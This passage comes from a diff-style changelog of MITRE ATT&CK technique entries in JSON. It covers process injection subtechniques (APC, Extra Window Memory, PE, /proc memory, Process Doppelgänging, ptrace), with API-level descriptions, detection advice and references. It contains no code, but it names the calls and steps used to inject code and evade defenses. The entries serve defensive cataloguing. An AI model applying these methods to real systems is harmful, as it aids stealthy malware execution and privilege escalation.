"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Boot Information", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#26" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Network Traffic: Network Connection Creation", + "Firmware: Firmware Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:08.824000+00:00\", \"old_value\": \"2025-04-15 19:58:15.890000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1028: Operating System Configuration", + "M1031: Network Intrusion Prevention", + "M1035: Limit Access to Resource Over Network", + "M1046: Boot Integrity", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0001: Firmware (Firmware Modification)", + "DS0017: Command (Command Execution)", + "DS0029: Network Traffic (Network Connection Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:29:43.786000+00:00", + "modified": "2025-04-25 14:47:11.435000+00:00", + "name": "Asynchronous Procedure Call", + "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/004", + "external_id": "T1055.004" + }, + { + "source_name": "Microsoft APC", + "description": "Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx" + }, + { + "source_name": "CyberBit Early Bird Apr 2018", + "description": "Gavriel, H. & Erbesfeld, B. (2018, April 11). New \u2018Early Bird\u2019 Code Injection Technique Discovered. Retrieved May 24, 2018.", + "url": "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/" + }, + { + "source_name": "ENSIL AtomBombing Oct 2016", + "description": "Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.", + "url": "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows" + }, + { + "source_name": "Microsoft Atom Table", + "description": "Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Access", + "Process: Process Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:11.435000+00:00\", \"old_value\": \"2025-04-15 19:58:44.390000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 17:18:32.126000+00:00", + "modified": "2025-04-25 14:45:37.275000+00:00", + "name": "Extra Window Memory Injection", + "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process\u2019s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process\u2019s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/011", + "external_id": "T1055.011" + }, + { + "source_name": "Microsoft Window Classes", + "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx" + }, + { + "source_name": "Microsoft GetWindowLong function", + "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx" + }, + { + "source_name": "Microsoft SetWindowLong function", + "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "MalwareTech Power Loader Aug 2013", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. Retrieved December 16, 2017.", + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + }, + { + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" + }, + { + "source_name": "Microsoft SendNotifyMessage function", + "description": "Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:37.275000+00:00\", \"old_value\": \"2025-04-15 19:58:00.917000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:27:31.344000+00:00", + "modified": "2025-04-25 14:47:15.984000+00:00", + "name": "Portable Executable Injection", + "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/002", + "external_id": "T1055.002" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Access", + "Process: OS API Execution", + "Process: Process Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:15.984000+00:00\", \"old_value\": \"2025-04-15 19:58:46.232000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:34:10.588000+00:00", + "modified": "2025-04-25 14:48:08.263000+00:00", + "name": "Proc Memory", + "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/009", + "external_id": "T1055.009" + }, + { + "source_name": "Uninformed Needle", + "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.", + "url": "http://hick.org/code/skape/papers/needle.txt" + }, + { + "source_name": "GDS Linux Injection", + "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.", + "url": "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html" + }, + { + "source_name": "DD Man", + "description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man1/dd.1.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:08.263000+00:00\", \"old_value\": \"2025-04-15 19:59:10.291000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1022: Restrict File and Directory Permissions", + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 17:19:50.978000+00:00", + "modified": "2025-04-25 14:47:03.621000+00:00", + "name": "Process Doppelg\u00e4nging", + "description": "Adversaries may inject malicious code into process via process doppelg\u00e4nging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelg\u00e4nging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelg\u00e4nging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelg\u00e4nging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nProcess Doppelg\u00e4nging is implemented in 4 steps (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017):\n\n* Transact \u2013 Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load \u2013 Create a shared section of memory and load the malicious executable.\n* Rollback \u2013 Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate \u2013 Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelg\u00e4nging may evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/013", + "external_id": "T1055.013" + }, + { + "source_name": "Microsoft TxF", + "description": "Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx" + }, + { + "source_name": "Microsoft Basic TxF Concepts", + "description": "Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx" + }, + { + "source_name": "Microsoft Where to use TxF", + "description": "Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx" + }, + { + "source_name": "BlackHat Process Doppelg\u00e4nging Dec 2017", + "description": "Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelg\u00e4nging. Retrieved December 20, 2017.", + "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf" + }, + { + "source_name": "hasherezade Process Doppelg\u00e4nging Dec 2017", + "description": "hasherezade. (2017, December 18). Process Doppelg\u00e4nging \u2013 a new way to impersonate a process. Retrieved December 20, 2017.", + "url": "https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/" + }, + { + "source_name": "Microsoft PsSetCreateProcessNotifyRoutine routine", + "description": "Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.", + "url": "https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Metadata", + "Process: OS API Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg\u00e4nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelg\u00e4nging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:03.621000+00:00\", \"old_value\": \"2025-04-15 19:58:40.683000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:33:19.065000+00:00", + "modified": "2025-04-25 14:48:25.896000+00:00", + "name": "Ptrace System Calls", + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes\u2019 memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/008", + "external_id": "T1055.008" + }, + { + "source_name": "PTRACE man", + "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html" + }, + { + "source_name": "Medium Ptrace JUL 2018", + "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.", + "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be" + }, + { + "source_name": "BH Linux Inject", + "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.", + "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf" + }, + { + "source_name": "ArtOfMemoryForensics", + "description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017." + }, + { + "source_name": "GNU Acct", + "description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.", + "url": "https://www.gnu.org/software/acct/" + }, + { + "source_name": "RHEL auditd", + "description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", + "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing" + }, + { + "source_name": "Chokepoint preload rootkits", + "description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.", + "url": "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Access", + "Process: Process Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:25.896000+00:00\", \"old_value\": \"2025-04-15 19:59:18.215000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": 